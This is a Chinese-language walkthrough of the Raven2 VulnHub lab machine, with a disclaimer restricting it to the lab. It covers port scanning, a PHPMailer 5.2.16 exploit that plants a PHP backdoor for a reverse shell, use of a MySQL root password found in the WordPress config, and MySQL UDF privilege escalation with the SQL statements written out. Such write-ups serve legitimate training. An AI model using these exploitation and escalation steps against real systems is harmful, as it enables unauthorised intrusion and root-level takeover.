前言
⏰时间:2023.7.16
🗺️靶机地址:https://download.vulnhub.com/raven/Raven2.ova
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
发现主机
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.58.1/24
Nmap scan report for 192.168.58.150
Host is up (0.000065s latency).
MAC Address: 00:0C:29:11:03:35 (VMware)
扫描开放端口
┌──(root㉿kali)-[~]
└─# masscan --rate=100000 -p 1-65535 192.168.58.150
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-16 06:51:30 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 192.168.58.150
Discovered open port 111/tcp on 192.168.58.150
Discovered open port 22/tcp on 192.168.58.150
Discovered open port 36431/tcp on 192.168.58.150
nmap针对开放端口进一步探测
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p T:80,111,22,36431 -v 192.168.58.150
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: Raven Security
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35347/tcp6 status
| 100024 1 36431/tcp status
| 100024 1 39649/udp status
|_ 100024 1 47483/udp6 status
36431/tcp open status 1 (RPC #100024)
针对80端口的网站,先扫目录
PHPmailer 5.2.16
vendor里面泄露出很多文件
path中发现flag1
readme下下来看看,描述phpmailer
version暴露版本
搜索exp
反弹shell
修改exp中的target
backdoor文件名自己起
python反弹的ip地址和端口添攻击机的
生成的后门php在/var/www/html/下
python 40974.py 运行
kali监听5555
去访问http://192.168.58.150/contact.php即可在网站根目录生成haha.php
再去访问http://192.168.58.150/haha.php即可收到shell
python开启交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
/var/www/flag2.txt
用命令搜一下flag
拿到flag3
进入wp目录找到数据库配置账号密码
mysql -uroot -pR@v3nSecurity进入数据库
use wordpress
show tables
select * from wp_users
UDF提权
show variables like '%plugin%';
查看提权文件存放位置
show variables like '%version%';
查看版本
找到利用的so文件
用sqlmap的cloak.py -d -i lib_mysqludf_sys.so_
编译生成lib_mysqludf_sys.so
将文件传到目标/var/www/html
select hex(load_file('/var/www/html/lib_mysqludf_sys.so')) into dumpfile '/var/www/html/so.txt';
为了方便操作,我连了蚁剑,写入so.txt,hex是为了将不可见字符一起编码,保证文件完整性
select 0x+so.txt内容 into dumpfile '//usr//lib//mysql//plugin//myudf.so';
create function sys_eval returns string soname 'myudf.so';